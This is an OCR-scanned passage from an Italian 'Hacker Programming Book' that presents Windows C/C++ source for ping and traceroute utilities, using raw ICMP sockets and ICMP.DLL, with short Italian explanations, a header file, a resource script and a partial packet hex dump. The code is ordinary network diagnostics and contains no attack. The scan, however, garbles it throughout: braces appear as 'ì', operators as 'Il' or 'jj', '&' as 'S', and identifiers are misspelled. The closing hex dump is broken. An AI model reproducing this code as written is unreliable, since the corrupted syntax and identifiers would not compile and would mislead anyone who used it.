SOCKET sockRaw = INVALID_SOCKET ; 

struct sockaddr_in dest, 

from; 

int bread, 

fromlen = sizeof (from) , 

timeout = 1000, 

ret; 

char *icmp_data = NULL, 

*recvbuf = NULL; 
unsigned int addr = 0; 

USHORT seq_no = 0; 

struct hostent *hp = NULL; 
IpOptionHeader ipopt; 



if (WSAStartup (MAKEWORD (2 , 2), SwsaData) != 0) 
{ 

pr int f ("WSAStartup () failed: %d\n", GetLastError ( ) ) ; 
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return —1; 

ì 

ValidateArgs (argc, argv) ; 

// 

// WSA_FLAG_ OVERLAPPED flag is required for SO_RCVTIMEO, 
// SO_SNDTIMEO option. If NULL is used as last pararti for 
// WSASocket, ali I/O on the socket is synchronous , the 
// internai user mode wait code never gets a chance to 
// execute, and therefore kernel-mode I/O blocks forever. 
// A socket created -via the socket function has the over- 
// lapped I/O attribute set internally . But here we need 
// to use WSASocket to speci fy a raw socket . 
// 

// If you want to use timeout with a synchronous 

// nonoverlapped socket created by WSASocket with last 

// param set to NULL, you can set the timeout by using 

// the select function, or you can use WSAEventSelect and 

// set the timeout in the WSAWaitForMultipleEvents 

// function. 

// 

SOCkRaw = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP , NULL, 0, 

WSA_FLAG_ OVERLAPPED) ; 
if (SOCkRaw == INVALID_SOCKET) 
{ 

printf( "WSASocket () failed: %d\n ", WSAGetLastError () ) ; 
return -1; 

} 

if (bRecordRoute) 
{ 

// Setup the IP option header to go out on every ICMP packet 

// 

ZeroMemory (Sipopt, sizeof (ipopt) ) ; 

ipopt . code = IP_RECORD_ROUTE ; // Record route option 

ipopt .ptr = 4; // Point to the first addr offs 

ipopt. len = 39; // Length of option header 

ret = setsockopt (sockRaw, IPPROTO_IP, IP_OPTIONS, 

(char *)&ipopt, sizeof (ipopt) ) ; 
if (ret == SOCKET_ERROR) 
{ 

printf ("setsockopt (IP_OPTIONS) failed: %d\n", 
WSAGetLastError () ) ; 

} 

ì 

// Set the send/recv timeout values 

// 

bread = setsockopt (sockRaw, SOL_SOCKET, SO_RCVTIMEO, 

(char*) &timeout, sizeof (timeout) ) ; 
if (bread == SOCKET_ERROR) 
{ 

printf ("setsockopt (SO_RCVTIMEO) failed: %d\n", 

WSAGetLastError () ) ; 
return -1; 

} 

timeout = 1000; 

bread = setsockopt (sockRaw, SOL_SOCKET, SO_SNDTIMEO, 

(char*) Stimeout, sizeof (timeout) ) ; 
if (bread == SOCKET_ERROR) 
( 
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prlntf("setsockopt(SO_SNDTIMEO) failed: %d\n", 

WSAGetLastError () ) ; 
return -1; 

} 

memset (&dest, 0, sizeof (dest) ) ; 

// 

// Resolve the endpoint ' s name if necessary 

// 

dest . s±n_family = AF_INET; 

if ( (dest . sin_addr . s_addr = inet_addr (lpdest) ) == INADDR_NONE) 
{ 

if ( (hp = gethostbyname (lpdest) ) != NULL) 
{ 

memcpy(& (dest . sin_addr) , hp->h_addr, hp->h_length) ; 
dest . sin_family = hp->h_addrtype ; 

printf ("dest . sin_addr = %s\n", inet_ntoa (dest . sin_addr) ) ; 

} 

else 
{ 

printf ("gethostbyname () failed: %d\n", 

WSAGetLastError () ) ; 
return -1; 

} 

ì 

// 

// Create the ICMP packet 

// 

datasize += sizeof (IcmpHeader) ; 

icmp_data = HeapAlloc (GetProcessHeap () , HEAP_ZERO_MEMORY, 
MAX_PACKET) ; 

recvbuf = HeapAlloc (GetProcessHeap () , HEAP_ZERO_MEMORY, 

MAX_PACKET) ; 
if ( ! icmp_data) 
{ 

printf ("HeapAlloc () failed: %d\n" , GetLastError ( ) ) ; 
return -1; 

ì 

memset (icmp_data, 0 , MAX_PACKET) ; 
FillICMPData (icmp_data, datasize) ; 

// 

// Start sending/receiving ICMP packets 

// 

while(l) 
{ 

static int nCount = 0; 
int bwrote; 

if (nCount++ == 4) 
break; 

( (IcmpHeader*) icmp_data) ->i_cksum = 0; 

( (IcmpHeader*) icmp_data) ->timestamp = GetTickCount () ; 

( (IcmpHeader*) icmp_data) ->i_seq = seq_no++; 

( (IcmpHeader*) icmp_data) ->i_cksum = 

checksum ( (USHORT*) icmp_data, datasize) ; 

bwrote = sendto (sockRaw, icmp_data, datasize, 0, 

(struct sockaddr*) sdest, sizeof (dest) ) ; 
if (bwrote == SOCKET_ERROR) 
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{ 

if (WSAGetLastError ( ) == WSAETIMEDOUT) 
{ 

printf ( "tlmed out \n ") ; 
continue; 

} 

printf ("sendtoO failed: %d\n", WSAGetLastError ()) ; 
return -1; 

} 

if (bwrote < datasize) 
{ 

printf ("Wrote %d bytes\n" , bwrote); 

} 

bread = recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, 

(struct sockaddr*) Sfrom, Sfromlen) ; 
if (bread == SOCKET_ERROR) 
{ 

if (WSAGetLastError ( ) == WSAETIMEDOUT) 
{ 

printf ("timed out\n") ; 
continue; 

) 

printf ( "recvfrom () failed: %d\n ", WSAGetLastError () ) ; 
return -1; 

} 

DecodeICMPHeader (recvbuf , bread, Sfrom); 
Sleep(lOOO) ; 

} 

// Cleanup 

// 

if (sockRaw .'= INVALID_SOCKET) 

closesocket (sockRaw) ; 
HeapFree (GetProcessHeap () , 0, recvbuf) ; 
HeapFree (GetProcessHeap () , 0, icmp_data) ; 

WSACleanup () ; 
return 0; 



Nel programma appena visto abbiamo creato le strutture relative al protocollo e dopo aver 
settato i valori dentro a queste abbiamo utilizzato le funzioni Windowsk per la gestione delle 
funzionalità di trasmissione su rete. 

Esiste all'interno di WINDOWS una DLL particolare, ICMP.DLL la quale incorpora le funzioni 
di gestione del protocollo ICMP. 

Mediante l'importazione di questa tramite la funzione API LoadLibrary è possibile utilizzare le 
funzioni. 

Per portare due esempi rivediamo il programma di PING scritto sfruttando questa DLL. 
Successivamente nel programma di TRACE che vedremo dopo verrà utilizzata la stessa 
metodologia. 

Dicevamo che questa metodologia utilizza le funzioni interne ad una DLL distribuita con 
Windows e precisamente ICMP.DLL. 
L'importazione avviene con : 

_cTraceRouteData.sm_hlcmp = LoadLibrary(_T("ICMP.DLL")); 
if (_cTraceRouteData.sm_hlcmp == NULL) 

{ 

TRACE(_T("Could not load up the ICMP DLL\n")); 
return FALSE; 

} 
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//Retrieve pointers to the functions in the ICMP dll 

sm_plcmpCreateFile = (IpIcmpCreateFile) 
GetProcAddress(_cTraceRouteData.sm_hlcmp,"lcmpCreateFile"); 

sm_plcmpSendEcho = (IpIcmpSendEcho) 
GetProcAddress(_cTraceRouteData.sm_hlcmp,"lcmpSendEcho" ); 

sm_plcmpCloseHandle = (IpIcmpCIoseHandle) 
GetProcAddress(_cTraceRouteData.sm_hlcmp,"lcmpCloseHandle"); 



if (sm_plcmpCreateFile == NULL [ 
sm_plcmpCloseHandle == NULL) 



smpIcmpSendEcho == NULL 



Il programma di PING rivisto con la LoadLibraryè il seguente. 

#include <windows.h> 
#include <winsock.h> 
#include <stdio.h> 
#include <string.h> 

typedef struct tagIPINFO 
{ 

u_char Ttl; // Time To Live 

u_charTos; // Type Of Service 

u_char IPFIags; //IPflags 
u_char OptSize; // Size of options data 

u_char FAR *Options; // Options data buffer 
JIPINFO, *PIPINFO; 



typedef struct tagICMPECHO 

{ 

ujong Source; 
ujong Status; 
ujong RTTime; 
u_short DataSize; 
u_short Reserved; 
void FAR *pData; 
IPINFO iplnfo; 
JICMPECHO, *PICMPECHO; 



// Source address 
// IP status 

// Round trip time in milliseconds 
// Reply data size 
// Unknown 
// Reply data buffer 
// Reply options 



// ICMP. DLL Export Function Pointers 
HANDLE (WINAPI *plcmpCreateFile)(VOID); 
BOOL (WINAPI *plcmpCloseHandle)(HANDLE); 
DWORD (WINAPI *plcmpSendEcho) 

(HANDLE,DWORD,LPVOID,WORD,PIPINFO,LPVOID,DWORD,DWORD); 



// 
// 

void main(int argc, char **argv) 
{ 

WSADATA wsaData; 
ICMPECHO icmpEcho; 
HANDLE hndllcmp; 
HANDLE hndIFile; 
LPHOSTENT pHost; 
struct in_addr iaDest; // 
DWORD *dwAddress; 
IPINFO iplnfo; 
int nRet; 
DWORD dwRet; 
intx; 



// WSADATA 
// ICMP Echo reply buffer 
// LoadLibrary() handle to ICMP.DLL 
// Handle for lcmpCreateFile() 
// Pointer to host entry structure 
Internet address structure 
//IP Address 
// IP Options structure 

// General use return code 
// DWORD return code 
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// Check arguments 

if (argc != 2) 

{ 

fprintf(stderr,"\nSyntax: pingi HostNameOrlPAddress\n"); 
return; 

} 

// Dynamically load the ICMP.DLL 
hndllcmp = LoadLibrarypCMP.DLL"); 
if (hndllcmp == NULL) 
{ 

fprintf(stderr,"\nCould not load ICMP.DLLAn"); 
return; 

} 

// Retrieve ICMP function pointers 
pIcmpCreateFile = (HANDLE (WINAPI *)(void)) 

GetProcAddress(hndllcmp,"lcmpCreateFile"); 
pIcmpCIoseHandle = (BOOL (WINAPI *)(HANDLE)) 

GetProcAddress(hndllcmp,"lcmpCloseHandle"); 
pIcmpSendEcho = (DWORD (WINAPI *) 

(HANDLE,DWORD,LPVOID,WORD,PIPINFO,LPVOID,DWORD,DWORD)) 

GetProcAddress(hndllcmp,"lcmpSendEcho"); 
// Check ali the function pointers 
if (pIcmpCreateFile == NULL || 

pIcmpCIoseHandle == NULL jj 

pIcmpSendEcho == NULL) 

{ 

fprintf(stderr,"\nError getting ICMP proc address\n"); 

FreeLibrary(hndllcmp); 

return; 

} 

// Init WinSock 

nRet = WSAStartup(0x0101 , SwsaData ); 
if (nRet) 
{ 

fprintf(stderr,"\nWSAStartup() error: %d\n", nRet); 
WSACIeanup(); 

FreeLibrary(hndllcmp); 

return; 

} 

// Check WinSock version 

if (0x01 01 != wsaData.wVersion) 

{ 

fprintf(stderr,"\nWinSock version 1.1 not supported\n"); 
WSACleanupO; 

FreeLibrary(hndllcmp); 

return; 

} 

// Lookup destination 
// Use inet_addr() to determine if we're dealing with a name 
// or an address 

iaDest.s_addr = inet_addr(argv[1]); 
if (iaDest.s_addr == INADDR NONE) 

pHost = gethostbyname(argv[1]); 
else 

pHost = gethostbyaddr((const char *)&iaDest, 
sizeof(struct in_addr), AFJNET); 
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if (pHost == NULL) 

{ 

fprintf(stderr, "\n%s not found\n", argv[1]); 
WSACIeanup(); 

FreeLibrary(hndllcmp); 
return; 

} 

// Teli the user what we're doing 
printf("\nPinging %s [%s]", pHost->h_name, 

inet_ntoa((*(LPIN_ADDR)pHost->h_addr_list[0]))); 

// Copy the IP address 

dwAddress = (DWORD *)(*pHost->h_addr_list); 

// Get an ICMP echo request handle 
hndIFile = plcmpCreateFile(); 
for (x = 0; x < 4; x++) 
{ 

// Set some reasonable default values 

ipInfo.Ttl = 255; 

ipInfo.Tos = 0; 

ipInfo.lPFIags = 0; 

ipInfo.OptSize = 0; 

ipInfo.Options = NULL; 

//icmpEcho. ipInfo.Ttl = 256; 

// Reqest an ICMP echo 

dwRet = plcmpSendEcho( 



hndIFile, // Handle from lcmpCreateFile() 

*dwAddress, // Destination IP address 

NULL, // Pointer to buffer to send 

0, // Size of buffer in bytes 

&iplnfo, // Request options 

SicmpEcho, // Reply buffer 

sizeof(struct tag ICMPECHO), 

5000); // Time to wait in milliseconds 
// Print the results 



iaDest.s_addr = icmpEcho. Source; 

printf("\n Reply from %s Time=%ldms TTL=%d", 
inet_ntoa(iaDest), 
icmpEcho. RTTime, 
icmpEcho. ipInfo.Ttl); 

if (icmpEcho. Status) 

{ 

printf("\nError: icmpEcho. Status=%ld", 
icmpEcho. Status); 

break; 

} 

} 

printf("\n"); 

// Close the echo request file handle 
plcmpCloseHandle(hndlFile); 
FreeLibrary(hndllcmp); 
WSACleanupQ; 



Vediamo ora I vari moduli di una programma di TRACEROUTE il quale può essere 
considerato un estensione delle funzioni di PING. 
La funzione main è la seguente : 
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^include "stdafx.h" 
^include "tracer.h" 

//Global varlable used to determine whether addresses should be resolved 
BOOL g_bResolveAddresses ; 



//Class derived to implement Trace Route 
class CMyTraceRoute : public CTraceRoute 
{ 

virtual BOOL OnSingleHostResult (int nHostNum, const CHostTraceMultiReplyS 
htmr) ; 

}; 

BOOL CMyTraceRoute: : OnSingleHostResult (int nHostNum, const 

CHostTraceMultiReplyS htmr) 

{ 

if (htmr . dwError == 0) 
{ 

hostent* phostent = NULL; 
if (g_bResolveAddresses) 

phostent = gethostbyaddr ( (char *) Shtmr .Address . S_un . S_addr, 4, 
PF_INET) ; 

if (phostent) 

_tprintf(_T(" %d\t%d ms\t%d ms\t%d ms\t%s [%d. %d. %d. %d] \n ") , 
nHostNum, htmr .minRTT, htmr.avgRTT, 

htmr.maxRTT, phostent->h_name, htmr .Address . S_un . S_un_b . s_bl , 
htmr . Address . S_un . S_un_b . s_b2, 

htmr . Address .S_un. S_un_b . s_b3, 
htmr . Address . S_un. S_un_b . s_b4) ; 
else 

_tprintf(_T(" %d\t%d ms\t%d ms\t%d ms\t%d. %d. %d. %d\n") , nHostNum, 
htmr. minRTT, htmr.avgRTT, htmr.maxRTT, 

htmr . Address .S_un. S_un_b . s_bl , htmr . Address . S_un. S_un_b . s_b2, 
htmr . Address . S_un. S_un_b . s_b3, 

htmr . Address .S_un. S_un_b . s_b4 ) ; 

} 

else 

_tprintf(_T(" %d\t*\t*\t*\tError:%d\n") , nHostNum, htmr . dwError) ; 
return TRUE; 

} 



//Good old void main 
tiifdef _UNICODE 

void wmain (int argc, wchar_t *argv[]) 
#else 

void main (int argc, char *argv[]) 

tendi f 

{ 

//Set the default values 
g_bResolveAddresses = TRUE; 
UCHAR nHops = 30; 
DWORD dwTimeout = 30000; 
int nPings = 3; 

//Validate the command line parameters 
if (argc < 2) 
{ 

_tprin tf(_T(" TRACER target_name [-d] [-h:Hopcount] [-w: timeout] 
[-p -.pingcount ] \n\n") ) ; 

_tprintf (_T ("Options : \n") ) ; 

_tprintf (_T (" -d Do not resolve addresses to 
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_tprlntf (_T ( " -h : max±mum_hops Maximum number of hops to search for 
target . \n ") ) ; 

_tprintf (_T ( " -w: timeout Wait timeout milliseconds for each 

reply. \n") ) ; 

_tprintf (_T ( " -p : pingcount The number of pings per host . \n" ) ) ; 

return; 

} 

//parse out the other command line options if any 

for (int i=l; i<argc; i++) 

{ 

if ( (_tcsicmp(argv[i] , _T("-d")) == 0) Il (_tcsicmp (argv [i] , _T("/d")) 
== 0)) 

g_bResolveAddresses = FALSE; 
else if ( (_tcsncmp (argv[i] , _T("-h"), 2) == 0) Il (_tcsncmp (argv [i] , 
_T("/h"), 2) == 0)) 
{ 

if (_tcslen(argv[i] ) > 3) 

nHops = (UCHAR) _ttoi (argv [i] + sizeof (TCHAR) *3) ; 

} 

else if ( (_tcsncmp (argv[i] , _T("-w"), 2) == 0) Il (_tcsncmp (argv [i] , 
_T("/w"), 2) == 0)) 
{ 

if (_tcslen (argv[i] ) > 3) 

dwTimeout = (DWORD) _ttoi (argv [i] + sizeof (TCHAR) * 3) ; 

} 

else if ( (_tcsncmp (argv[i] , _T ("-p") , 2) == 0) Il (_tcsncmp (argv [i] , 
_T("/p"), 2) == 0)) 
{ 

if (_tcslen (argv[i] ) > 3) 

nPings = _ttoi (argv[i] + sizeof (TCHAR) *3) ; 

} 

) 

//Print the intro comment 

_tprintf (_T ( "\nTracing route to %s\nover a maximum of %d hops : \n\n") , 
argv[ 1 ] , nHops) ; 

//Do the actual trace route 
CTraceRouteReply trr; 
CMyTraceRoute tr; 

if (tr .Trace (argv [1] , trr, nHops, dwTimeout, nPings) ) 
_tprintf (_T(" \nTrace complete . \n ") ) ; 
else 

_tprintf (_T ("Failed in cali to tracer, GetLastError returns : %d") , 
GetLastError () ) ; 



Le seguenti funzioni servono all'inizializzazione dei dati. 

^include "stdafx.h" 
^include " tracer. h" 
^include <limits.h> 



///////////////////////////////// Macros & Statics 
/////////////////////////// 

#define MIN_ICMP_PACKET_SIZE 8 //minimum 8 byte icmp packet (just header) 
#define MAX_ICMP_PACKET_SIZE 1024 //Maximum icmp packet size 

BOOL CTraceRoute : : sm_bAttemptedIcmpInitialise = FALSE; 
lpIcmpCreateFile CTraceRoute: : sm_pIcmpCreateFile = NULL; 
lpIcmpSendEcho CTraceRoute: : sm_pIcmpSendEcho = NULL; 
lpIcmpCloseHandle CTraceRoute : : sm pIcmpCloseHandle = NULL; 
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#undef THIS_FILE 

static char THIS_FILE[] = FILE 

tiendif 



///////////////////////////////// Implementation 
////////////////////////////// 

//Internai class whlch Is used to ensure that the ICMP 
//handle and wlnsock stack is closed upon exit 
Class _CTRACEROUTE 
{ 

public: 

_ CTRACEROUTE () ; 

~_CTRACEROUTE () ; 
protected : 

HINSTANCE sm_hlcmp; 

friend class CTraceRoute; 

}; 

_ CTRACEROUTE : : _CTRACEROUTE ( ) 
{ 

sm_hlcmp = NULL; 

} 

_CTRACEROUTE : : ~_CTRACEROUTE ( ) 
{ 

if (sm_hlcmp) 
{ 

FreeLibrary (sm_hlcmp) ; 
sm_hlcmp = NULL; 

} 

WSACleanup () ; 

} 

static _CTRACEROUTE _cTraceRouteData ; 



BOOL CTraceRoute : : Initialise () const 
{ 

if ( ! sm_bAt t empt edlcmplni tialise) 
{ 

sm_bAttemptedIcmpInitialise = TRUE; 

//Initialise the winsock stack 
WSADATA ws a; 

if (WSAStartup (MAKEWORD (1, 1) , &wsa) != 0) 
{ 

TRACE (_T ( "Could not negotiate a correct version of 

WinSock\n") ) ; 

return FALSE; 

} 

//Load up the ICMP library 

_cTraceRouteData . sm_hlcmp = LoadLibrary (_T( "ICMP . DLL ") ) ; 

if (_cTraceRouteData . sm_hlcmp == NULL) 

{ 

TRACE (_T ("Could not load up the ICMP DLL\n ") ) ; 
return FALSE; 

} 

//Retrieve pointers to the functions in the ICMP dll 
sm_pIcmpCreateFile = (lpIcmpCreateFile) 
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sm_pIcmpSendEcho = (lpIcmpSendEcho) 
GetProcAddress (_cTraceRouteData . sia_hlcmp, " IcmpSendEcho " ) ; 

sm_pIcmpCloseHandle = (lpIcmpCloseHandle) 
GetProcAddress (_cTraceRouteData . sm_hlcmp, " IcmpCloseHandle ") ; 

if (sm__pIcmpCreateFile == NULL / / sm_pIcmpSendEcho == NULL / / 
sm__pIcmpCloseHandle == NULL) 

TRACE (_T ( "Could not find ICMP functions in the ICMP DLL\n ") ) ; 

} 

return (sm__pIcmpCreateFile .'= NULL SS sm _pIcmpSendEcho != NULL SS 
sm__pIcmpCloseHandle != NULL); 

} 

La funzione che segue invece è quella che in effetti implementa il TRACE. 



BOOL CTraceRoute: -.Trace (LPCTSTR pszHostName, CTraceRouteReplyS trr, UCHAR 

nHopCount, DWORD dwTimeout, DWORD dwPingsPerHost) 

{ 

//For correct operation of the T2A macro, see TN059 
USES_CONVERSION; 

//Validate our parameters 
ASSERT (pszHostName) ; 

ASSERT(trr.GetSize() == 0) ; //Should be empty initially 
ASSERT (nHopCount > 0) ; 

//Make sure everything is initialised 
if (Unitialisef) ) 
return FALSE; 

LPSTR IpszAscii = T2A ( (LPTSTR) pszHostName) ; 
/ /Convert from dotted notation if required 
unsigned longaddr = inet_addr (IpszAscii) ; 
if (addr == INADDR_NONE) 
{ 

//Not a dotted address, then do a lookup of the name 
hostent* hp = gethostbyname (IpszAscii) ; 
if (hp) 

memcpy (Saddr, hp->h_addr, hp->h_length) ; 

else 
{ 

TRACE (_T ("Could not resolve the host name %s\n"), 

pszHostName) ; 

return FALSE; 

} 

} 

ASSERT (_cTraceRouteData. sm_hlcmp) ; //ICMP dll must be open 

//Iterate through ali the hop count values 
BOOL bReachedHost = FALSE; 

for (UCHAR i=l; i<=nHopCount SS ! bReachedHost ; i++) 
{ 

CHostTraceMultiReply htrr; 
htrr . dwError = 0; 
htrr.minRTT = ULONG_MAX; 
htrr.avgRTT = 0; 
htrr .maxRTT = 0; 

//Iterate through ali the pings for each host 

DWORD totalRTT = 0; 

CHostTraceSingleReply htsr; 

htsr . Address . S_un. S_addr = 0; 

htsr.dwError = 0; 

BOOL bPingError = FALSE; 

for (DWORD j=0; j<dwPingsPerHost SS IbPingError; j++) 
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if (Plng (addr, htsr, i, dwTlmeout) ) 

{ 

if (htsr . dwError == 0) 
{ 

//Acumulate the total RTT 
totalRTT += htsr. RTT; 

//Store away the RTT's 

if (htsr .RTT < htrr.minRTT) 

htrr.minRTT = htsr .RTT; 
if (htsr .RTT > htrr.maxRTT) 

htrr.maxRTT = htsr .RTT; 

//Cali the virtual function 
if (!OnPingResult (j+1, htsr)) 
{ 

SetLastError ( ERROR_ CANCELLED ) ; 
return FALSE; 

} 

} 

else 
{ 

htrr . dwError = htsr . dwError; 
bPingError = TRUE; 

} 

} 

else 

return FALSE; 

} 

htrr.Address = htsr.Address; 
if (htrr . dwError == 0) 

htrr.avgRTT = totalRTT / dwPingsPerHost ; 
else 
{ 

htrr.minRTT = 0; 
htrr.avgRTT = 0; 
htrr.maxRTT = 0; 

} 

//Cali the virtual function 

if ( !OnSingleHostResult (i, htrr)) 

{ 

SetLastError ( ERROR_ CANCELLED ) ; 
return FALSE; 

} 

//Add to the list of hosts 
trr.Add(htrr) ; 

/ /Have we reached the final host ? 
if (addr == htrr .Address . S_un . S_addr) 
bReachedHost = TRUE; 

} 




Come avevamo detto prima il TRACE utilizza delle funzioni di PING. 
Questa è scritta nella funzione che segue. 



BOOL CTracsRoute: :Ping (unsigned long addr, CHostTraceSingleReply& 

htsr, UCHAR nTTL, DWORD dwTlmeout, UCHAR nPacketSize) const 

{ 

//Create the ICMP handle 

HANDLE hIP = sm_pIcmpCreateFile () ; 
if (hIP == INVALID_HANDLE_VALUE) 
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TRACE (_T("Could not get a valid ICMP handle\n" ) ) ; 
return FALSE; 

} 

//Set up the option info structure 

IP_OPTION_INFORMATION Optionlnfo; 

ZeroMemory (SOptionlnfo, sizeof (IP_OPTION_INFORMATION) ) ; 
Optionlnfo .Ttl = nTTL; 

//Set up the data which will be sent 

unsigned char* pBuf = new unsigned char [nPacketSize] ; 
memset (pBuf, 'E', nPacketSize); 

//Do the actual Ping 
int nReplySize = sizeof (ICMP_ECHO_REPLY) + 
max (MIN_ICMP_PACKET_SIZE, nPacketSize) ; 

unsigned char* pReply = new unsigned char [nReplySize] ; 

ICMP_ECHO_REPLY* pEchoReply = (ICMP_ECHO_REPLY*) pReply; 
DWORD nRecvPackets = sm__pIcmpSendEcho (hIP, addr, pBuf, nPacketSize, 
SOptionlnfo, pReply, nReplySize, dwTimeout) ; 

BOOL bSuccess = TRITE; 

//Check we got the packet back 

if (nRecvPackets != 1) 

htsr . dwError = GetLastError ( ) ; 
else 
{ 

//Ping was success fui, copy over the pertinent info 
//into the return structure 

htsr .Address . S_un . S_addr = pEchoReply->Address; 
htsr.RTT = pEchoReply->RoundTripTime; 

ì 

//Close the ICMP handle 

sm_pIcmpCloseHandle (hIP) ; 

//Free up the memory we allocated 
delete [] pBuf; 
delete [] pReply; 

//return the status 
return bSuccess; 

ì 

Infine l'ultima funzione è quella che interpreta i risultati dei vari PING. 

BOOL CTraceRoute : : OnPingResult (int nPingNum, const 

CHostTraceSingleReplyS htsr) 

{ 

//De fault behaviour is just to trace the result and return 
//TRUE to allow the trace route to continue 

TRACE (_T( "OnPingResult : %d, IP: %d.%d.%d.%d, RTT : %d, Error: 
%d\n"), nPingNum, 

htsr .Address . S_un. S_un_b. s_bl, htsr .Address . S_un. S_un_b. s_b2, 
htsr . Address . S_un . S_un_b . s_b3, 

htsr .Address . S_un . S_un_b . s_b4 , htsr .RTT, htsr .dwError) ; 

return TRUE; 

) 
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BOOL CTraceRoute : : OnSingleHostResult (int nHostNum, const 

CHostTraceMultiReplyS htmr) 

{ 

//Default behaviour is just to trace the result and return 
//TRUE to allow the trace route to continue 

TRACE (_T ( "OnSingleHostResult : %d, IP: %d.%d.%d.%d, Min RTT : %d, Avg 
RTT : %d, Max RTT: %d, Error : %d\n"), nHostNum, 

htmr . Address . S_un . S_un_b. s_bl, htmr . Address . S_un . S_un_b. s_b2, 
htmr . Address . S_un . S_un_b . s_b3, 

htmr. Address. S_un.S_un_b.s_b4, htmr.minRTT, htmr.avgRTT, 
htmr . maxRTT, htmr . dwError) ; 




Il seguente è il tracer.h che contiene informazioni usate dalle funzioni. 

iifndef TRACER_H 

#define TRACER_H 



#ifndef AFXTEMPL_H 

#pragma message ("Trace route class needs afxtempl.h in your PCH") 
#endif 



/////////////////////////// Classes ///////////////////////////////// 

//These defines & structure definitions are taken from the 
" ipexport . h " and 

//"icmpapi .h" header files as provided with the Platform SDK and 
//are used internally by the CTraceRoute class. Including them here 
allows 

//you to compile the CTraceRoute code without the need to have the 
full 

//Platform SDK installed. 



typedef unsigned long IPAddr; 



// An IP address. 



typedef struct tagIP_OPTION_INFORMATION 
{ 



unsigned char 
unsigned char 
unsigned char 
unsigned char 
data 

unsigned char FAR *OptionsData; 
} IP_OPTION_INFORMATION; 



Ttl; 
Tos; 
Flags; 

OptionsSize; 



// Time To Live 

// Type Of Service 

// IP header flags 

// Size in bytes of options 

// Pointer to options data 



typedef struct t a gICMP_ECHO_REPL Y 
{ 



IPAddr 

unsigned long 
unsigned long 
unsigned short 
unsigned short 
void FAR 



Address; 
Status; 

RoundTripTime ; 
DataSize; 
Reserved; 
*Data; 



IP_OPTION_INFORMATION Options; 
ICMP_ECHO_REPLY; 



// Replying address 

// Reply IP_STATUS 

// RTT in milliseconds 

// Reply data size in bytes 

// Reserved for system use 

// Pointer to the reply data 

// Reply options 



typedef IP_OPTION_INFORMATION FAR* LPIP_OPTION_INFORMATION; 
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typedef ICMP_ECHO_REPLY FAR* LPICMP_ECHO_REPLY; 
typedef HANDLE (WINAPI IcmpCreateFile) (VOID) ; 
typedef IcmpCreateFile* lpIcmpCreateFile; 

typedef BOOL (WINAPI IcmpCloseHandle) (HANDLE IcmpHandle) ; 
typedef IcmpCloseHandle* lpIcmpCloseHandle; 

typedef DWORD (WINAPI IcmpSendEcho) (HANDLE IcmpHandle, IPAddr 
DestinationAddress, 

LPVOID RequestData, WORD 

RequestSize, 

LPIP_ OP TION_ INFORMA TION 

RequestOptions, 

LPVOID ReplyBuffer, DWORD 

ReplySize, DWORD Timeout); 

typedef IcmpSendEcho* lpIcmpSendEcho; 



struct CHostTraceSingleReply 
{ 

DWORD dwError; //GetLastError for this replier 

in_addr Address; //The IP address of the replier 

unsigned long RTT; //Round Trip time in milliseconds for this 
replier 

ì; 

struct CHostTraceMultiReply 
{ 

DWORD dwError; //GetLastError for this host 

in_addr Address; //The IP address of the replier 

DWORD minRTT; //Minimum round trip time in milliseconds 
DWORD avgRTT; //Average round trip time in milliseconds 
DWORD maxRTT; //Maximum round trip time in milliseconds 

}; 

typedef CArray<CHostTraceMultiReply, CHostTraceMultiReply&> 
CTraceRouteReply ; 



//The actual class which does the Trace Route 

class CTraceRoute 
{ 

public: 
//Methods 

BOOL Trace (LPCTSTR pszHostName, CTraceRouteReplyS trr, UCHAR 
nHopCount = 30, DWORD dwTimeout = 30000, DWORD dwPingsPerHost = 3) ; 

// Overi dabl es 

virtual BOOL OnPingResult (int nPingNum, const 
CHostTraceSingleReplyS htsr); 

virtual BOOL OnSingleHostResult (int nHostNum, const 
CHostTraceMultiReplyS htmr) ; 

protected: 

BOOL Initialise () const; 

BOOL Ping (unsigned long addr, CHostTraceSingleReplyS htsr, UCHAR 
nTTL, DWORD dwTimeout, UCHAR nPacketSize = 32) const; 
static BOOL sm_bAttemptedIcmpInitialise; 
static lpIcmpCreateFile sm_pIcmpCreateFile ; 
static lpIcmpSendEcho sm__p IcmpSendEcho; 
static lpIcmpCloseHandle sm_pIcmpCloseHandle; 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



}; 

#endif // TRACER_H 

Infine anche il file .re 

//Microsoft Developer Studio generated resource script . 

// 

^include "resource. h" 

#define APSTUDIO_READONLY_SYMBOLS 

///////////////////////////////////////////////////////////////////// 

//////// 

// 

// Generated front the TEXTINCL UDE 2 resource. 

// 

^include "afxres.h" 

///////////////////////////////////////////////////////////////////// 
//////// 

#undef APS TUDIO_READONL Y_ S YMBOLS 

///////////////////////////////////////////////////////////////////// 
//////// 

// English (Ireland) resources 

#if ! defined (AFX_RESOURCE_DLL) Il defined (AFX_TARG_ENI) 
iifdef JWIN32 

LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_EIRE 
#pragma code _page (1252) 
#endif //_WIN32 

///////////////////////////////////////////////////////////////////// 

//////// 

// 

// Icon 

// 

// Icon with lowest ID value placed first to ensure application icon 
// remains consistent on ali systems . 

IDR_MAINFRM ICON DISCARDABLE "res \\mainfrm. ico" 

#ifdef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////// 

//////// 

// 

// TEXTINCLUDE 

// 

1 TEXTINCLUDE DISCARDABLE 
BEGIN 

"resource .h\0" 

END 

2 TEXTINCLUDE DISCARDABLE 
BEGIN 

"iinclude " "afxres .h""\r\n" 
"\0" 

END 

3 TEXTINCLUDE DISCARDABLE 
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BEGIN 

"\r\n" 
"\0" 

END 

#endif // APSTUDIO_INVOKED 

#endif // English (Ireland) resources 

///////////////////////////////////////////////////////////////////// 
//////// 



#ifndef APSTUDIO_INVOKED 

///////////////////////////////////////////////////////////////////// 

//////// 

// 

// Generated from the TEXTINCL UDE 3 resource. 

// 



///////////////////////////////////////////////////////////////////// 
//////// 

#endif // not APSTUDIO_INVOKED 



Volendo vedere un DUMP di una richiesta di ECHO avremmo la seguente visione. 
Il DUMP di un pacchetto ECHO visto in esadecimale è : 



0: 


0800 


2086 


354b 


OOeO 


f726 


3fe9 


0800 


4500 


.. .5K. 


.^S?. . .E. 


16: 


0054 


aafb 


4000 


fcOl 


fa30 


8b85 


e902 


8b85 


.T.Ù@.Ù 


.ÙO 


32: 


d96e 


0000 


45da 


le60 


0000 


335e 


3ab8 


